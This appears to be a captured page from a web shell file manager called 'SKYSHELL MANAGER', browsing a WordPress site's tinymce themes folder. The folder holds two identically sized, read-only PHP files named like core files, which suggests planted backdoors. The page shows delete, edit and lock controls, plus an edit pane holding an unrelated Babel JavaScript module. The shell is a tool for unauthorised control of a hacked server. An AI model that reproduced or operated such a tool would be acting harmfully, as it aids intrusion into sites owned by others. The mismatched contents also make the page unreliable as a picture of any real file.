📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: cjs-proxy.cjs
"use strict"; const babelP = import("./lib/index.js"); const functionNames = [ "createConfigItem", "loadPartialConfig", "loadOptions", "transform", "transformFile", "transformFromAst", "parse", ]; for (const name of functionNames) { exports[`${name}Sync`] = function () { throw new Error( `"${name}Sync" is not supported when loading @babel/core using require()` ); }; exports[name] = function (...args) { babelP.then(babel => { babel[name](...args); }); }; exports[`${name}Async`] = function (...args) { return babelP.then(babel => babel[`${name}Async`](...args)); }; }
Save